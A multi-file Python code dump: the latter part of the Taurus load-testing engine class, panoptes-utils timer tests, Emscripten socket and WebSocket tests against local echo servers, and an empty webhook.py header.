self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
        Wait for the modules to finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
if self.graceful_tmp:
open(self.graceful_tmp, 'x').close()
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if self.graceful_tmp and os.path.exists(self.graceful_tmp):
os.remove(self.graceful_tmp)
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
        # services go last because of shellexec, which is the "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
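    # Usage sketch (names are hypothetical): a module that needs its own results
    # file inside the artifacts dir would call
    #
    #   kpi_file = self.engine.create_artifact("kpi", ".jtl")
    #
    # which returns something like "<artifacts-dir>/kpi.jtl" (a numbered variant
    # if that name is already taken).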
def existing_artifact(self, filename, move=False, target_filename=None):
"""
        Add an existing artifact; it will be collected into the artifacts dir. If
        move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = self.__expand_artifacts_dir()
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
        dump = self.create_artifact("effective", "")  # TODO: not ideal, since this file does not exist yet
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def __expand_artifacts_dir(self):
envs = self.__get_envs_from_config()
artifacts_dir = custom_expandvars(self.artifacts_dir, envs)
artifacts_dir = expand_variable_with_os(artifacts_dir)
artifacts_dir = get_full_path(artifacts_dir)
return artifacts_dir
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
        Create a new instance of a module, using its alias from the module
        settings section of the config. Thus, to be instantiated, a module must
        be mentioned in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
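    # Illustrative sketch (alias and class shown only as an assumed config):
    #
    #   modules:
    #     console:
    #       class: bzt.modules.console.ConsoleStatusReporter
    #
    # engine.instantiate_module("console") then loads that class, instantiates
    # it, and wires up .log, .engine and .settings before returning it.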
def find_file(self, filename):
"""
        Try to find a file or dir in the search paths, if any were specified. Helps find
        files in non-CLI environments or relative to the config path.
        The returned path is already absolute and must not be post-processed with abspath/etc.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(package_path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them so they can interact with each other if needed
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
return False
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
if VERSION == DEV_VERSION:
return
params = (VERSION, install_id)
addr = "https://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
try:
response = client.request('GET', addr, timeout=10)
except NETWORK_PROBLEMS:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
return
data = response.json()
latest = data.get('latest')
needs_upgrade = data.get('needsUpgrade')
if latest is None or needs_upgrade is None:
self.log.warning(f'Wrong updates info: "{data}"')
else:
self.log.debug(f'Taurus updates info: "{data}"')
mine = LooseVersion(VERSION)
if (mine < latest) or needs_upgrade:
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.__get_envs_from_config()
envs = expand_envs_with_os(envs)
def apply_env(value, key, container):
if isinstance(value, str):
container[key] = custom_expandvars(value, envs)
BetterDict.traverse(self.config, apply_env)
self.__export_variables_to_os()
def __export_variables_to_os(self):
"""
Export all user-defined environment variables to the system.
Example:
settings:
env:
FOO: bbb/ccc
BAR: aaa
"""
envs = self.__get_envs_from_config()
for var_name in envs:
if envs[var_name] is None:
if var_name in os.environ:
os.environ.pop(var_name)
else:
os.environ[var_name] = envs[var_name]
self.log.debug("OS env: %s=%s", var_name, envs[var_name])
def __get_envs_from_config(self):
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
return envs
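# Illustrative sketch (an assumption added for clarity, not part of the original engine):
# __load_module() and instantiate_module() above read the "modules" section of the config,
# where each alias maps either to a class-name string or to a dict with a "class" key plus
# module settings. The alias and extra setting below are hypothetical examples only:
#
#   modules:
#     jmeter:
#       class: bzt.modules.jmeter.JMeterExecutor
#       some-module-setting: value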
|
test_time.py
|
import os
import threading
import time
from datetime import datetime as dt
from datetime import timezone as tz
import pytest
from astropy import units as u
from panoptes.utils import CountdownTimer
from panoptes.utils import current_time
from panoptes.utils import error
from panoptes.utils.time import wait_for_events
def test_pretty_time():
t0 = '2016-08-13 10:00:00'
os.environ['POCSTIME'] = t0
t1 = current_time(pretty=True)
assert t1 == t0
# This will increment one second - see docs
t2 = current_time(flatten=True)
assert t2 != t0
assert t2 == '20160813T100001'
# This will increment one second - see docs
t3 = current_time(datetime=True)
assert t3 == dt(2016, 8, 13, 10, 0, 2, tzinfo=tz.utc)
def test_countdown_timer_bad_input():
with pytest.raises(ValueError):
assert CountdownTimer('d')
with pytest.raises(ValueError):
assert CountdownTimer(current_time())
with pytest.raises(AssertionError):
assert CountdownTimer(-1)
def test_countdown_timer_non_blocking():
timer = CountdownTimer(0)
assert timer.is_non_blocking
assert timer.time_left() == 0
for arg, expected_duration in [(2, 2.0), (0.5, 0.5), (1 * u.second, 1.0)]:
timer = CountdownTimer(arg)
assert timer.duration == expected_duration
def test_countdown_timer():
count_time = 1
timer = CountdownTimer(count_time)
assert timer.time_left() > 0
assert timer.expired() is False
assert timer.is_non_blocking is False
counter = 0.
while timer.time_left() > 0:
time.sleep(0.1)
counter += 0.1
assert counter == pytest.approx(1)
assert timer.time_left() == 0
assert timer.expired() is True
def test_countdown_timer_sleep():
count_time = 1
timer = CountdownTimer(count_time)
assert timer.time_left() > 0
assert timer.expired() is False
assert timer.is_non_blocking is False
counter = 0.
while timer.time_left() > 0.5:
assert timer.sleep(max_sleep=0.1)
counter += 0.1
# Wait for the remaining half second
assert timer.sleep() is False
assert counter == pytest.approx(0.5)
assert timer.time_left() == 0
assert timer.expired() is True
assert timer.sleep() is False
def test_countdown_timer_sleep_log(caplog):
count_time = 1
timer = CountdownTimer(count_time)
# Default is a debug level
timer.sleep()
assert caplog.records[-1].levelname == 'DEBUG'
assert caplog.records[-1].message.startswith('Sleeping for')
timer.restart()
timer.sleep(log_level='info')
assert caplog.records[-1].levelname == 'INFO'
assert caplog.records[-1].message.startswith('Sleeping for')
@pytest.mark.slow
def test_wait_for_events():
# Create some events, normally something like taking an image.
event0 = threading.Event()
event1 = threading.Event()
# Wait for 30 seconds but interrupt after 1 second by returning False from the callback.
def interrupt_cb():
time.sleep(1)
return False
assert wait_for_events([event0, event1], timeout=30, callback=interrupt_cb) is False
# Timeout if event is never set.
with pytest.raises(error.Timeout):
wait_for_events(event0, timeout=1)
# Setting events causes timer to exit.
def set_events():
time.sleep(3)
event0.set()
event1.set()
threading.Thread(target=set_events).start()
assert wait_for_events([event0, event1], timeout=30)
# If the events are set then the function will return immediately
assert wait_for_events([event0, event1], timeout=30)
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import multiprocessing
import os
import socket
import shutil
import sys
import time
from subprocess import Popen
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner sockets')
import clang_native
import common
from common import BrowserCore, no_windows, create_file, test_file, read_file
from common import parameterized, requires_native_clang, PYTHON
from tools import shared, config, utils
from tools.shared import EMCC, path_from_root, run_process, CLANG_CC
npm_checked = False
def clean_processes(processes):
for p in processes:
if getattr(p, 'exitcode', None) is None and getattr(p, 'returncode', None) is None:
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
p.kill()  # SIGKILL
except OSError:
pass
class WebsockifyServerHarness():
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
cmd = [CLANG_CC, test_file(self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args
print(cmd)
run_process(cmd, env=clang_native.get_clang_native_env())
process = Popen([os.path.abspath('server')])
self.processes.append(process)
import websockify
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
return self
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness():
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(config.NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([EMCC, '-Werror', test_file(self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(config.NODE_JS + ['server.js'])
self.processes.append(process)
return self
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess():
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
return self
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(config.NODE_JS + [test_file('websocket/nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, test_file('websocket/tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super().setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use
# consecutive server listen ports, because server teardown might not occur deterministically
# (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port
# addresses. If adding new tests, increment the used port addresses below.
@parameterized({
'websockify': [WebsockifyServerHarness, 49160, ['-DTEST_DGRAM=0']],
'tcp': [CompiledServerHarness, 49161, ['-DTEST_DGRAM=0']],
'udp': [CompiledServerHarness, 49162, ['-DTEST_DGRAM=1']],
# The following forces non-NULL addr and addlen parameters for the accept call
'accept_addr': [CompiledServerHarness, 49163, ['-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1']],
})
def test_sockets_echo(self, harness_class, port, args):
if harness_class == WebsockifyServerHarness and common.EMTEST_LACKS_NATIVE_CLANG:
self.skipTest('requires native clang')
with harness_class(test_file('sockets/test_sockets_echo_server.c'), args, port) as harness:
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=%d' % harness.listen_port] + args)
def test_sockets_echo_pthreads(self):
with CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 49161) as harness:
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DSOCKK=%d' % harness.listen_port])
def test_sdl2_sockets_echo(self):
with CompiledServerHarness('sdl2_net_server.c', ['-sUSE_SDL=2', '-sUSE_SDL_NET=2'], 49164) as harness:
self.btest_exit('sdl2_net_client.c', args=['-sUSE_SDL=2', '-sUSE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
@parameterized({
'websockify': [WebsockifyServerHarness, 49166, ['-DTEST_DGRAM=0']],
'tcp': [CompiledServerHarness, 49167, ['-DTEST_DGRAM=0']],
'udp': [CompiledServerHarness, 49168, ['-DTEST_DGRAM=1']],
# The following forces non-NULL addr and addlen parameters for the accept call
'accept_addr': [CompiledServerHarness, 49169, ['-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1']],
})
def test_sockets_async_echo(self, harness_class, port, args):
if harness_class == WebsockifyServerHarness and common.EMTEST_LACKS_NATIVE_CLANG:
self.skipTest('requires native clang')
args.append('-DTEST_ASYNC=1')
with harness_class(test_file('sockets/test_sockets_echo_server.c'), args, port) as harness:
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=%d' % harness.listen_port] + args)
def test_sockets_async_bad_port(self):
# Deliberately attempt a connection on a port that will fail to test the error callback and
# getsockopt
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=49169', '-DTEST_ASYNC=1'])
@parameterized({
'websockify': [WebsockifyServerHarness, 49171, ['-DTEST_DGRAM=0']],
'tcp': [CompiledServerHarness, 49172, ['-DTEST_DGRAM=0']],
'udp': [CompiledServerHarness, 49173, ['-DTEST_DGRAM=1']],
})
def test_sockets_echo_bigdata(self, harness_class, port, args):
if harness_class == WebsockifyServerHarness and common.EMTEST_LACKS_NATIVE_CLANG:
self.skipTest('requires native clang')
sockets_include = '-I' + test_file('sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += chr(ord('a') + (i % 26))
# re-write the client test with this literal (it's too big to pass via command line)
src = read_file(test_file('sockets/test_sockets_echo_client.c'))
create_file('test_sockets_echo_bigdata.c', src.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message))
with harness_class(test_file('sockets/test_sockets_echo_server.c'), args, port) as harness:
self.btest_exit('test_sockets_echo_bigdata.c', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port] + args)
@no_windows('This test is Unix-specific.')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_partial_client.c'), assert_returncode=165, args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_select_server_down_client.c'), args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_select_server_closes_connection_client_rw.c'), args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(test_file('third_party', 'enet'), 'enet')
with utils.chdir('enet'):
self.run_process([path_from_root('emconfigure'), './configure', '--disable-shared'])
self.run_process([path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + self.in_dir('enet', 'include')]
with CompiledServerHarness(test_file('sockets/test_enet_server.c'), enet, 49210) as harness:
self.btest_exit(test_file('sockets/test_enet_client.c'), args=enet + ['-DSOCKK=%d' % harness.listen_port])
@parameterized({
'native': [WebsockifyServerHarness, 59160, ['-DTEST_DGRAM=0']],
'tcp': [CompiledServerHarness, 59162, ['-DTEST_DGRAM=0']],
'udp': [CompiledServerHarness, 59164, ['-DTEST_DGRAM=1']],
})
def test_nodejs_sockets_echo(self, harness_class, port, args):
if harness_class == WebsockifyServerHarness and common.EMTEST_LACKS_NATIVE_CLANG:
self.skipTest('requires native clang')
# Basic test of node client against both a Websockified and compiled echo server.
with harness_class(test_file('sockets/test_sockets_echo_server.c'), args, port) as harness:
expected = 'do_msg_read: read 14 bytes'
self.do_runf(test_file('sockets/test_sockets_echo_client.c'), expected, emcc_args=['-DSOCKK=%d' % harness.listen_port] + args)
@requires_native_clang
def test_nodejs_sockets_echo_subprotocol(self):
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
# server because as long as the subprotocol list contains binary it will configure itself to accept binary data.
# This test also checks that the connect url contains the correct subprotocols.
with WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 59166):
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '-sSOCKET_DEBUG', '-sWEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
create_file('websocket_pre.js', '''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
with WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 59168):
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js=websocket_pre.js', '-sSOCKET_DEBUG', '-DSOCKK=12345'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest_exit(test_file('websocket/test_websocket_send.c'), args=['-lwebsocket', '-sNO_EXIT_RUNTIME', '-sWEBSOCKET_DEBUG'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets
# -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
self.run_process(['cmake', path_from_root('tools/websocket_to_posix_proxy')])
self.run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest_exit(test_file('websocket/tcp_echo_client.c'), args=['-lwebsocket', '-sPROXY_POSIX_SOCKETS', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
|
webhook.py
|
#
# Copyright 2021, NTT Communications Corp.
#
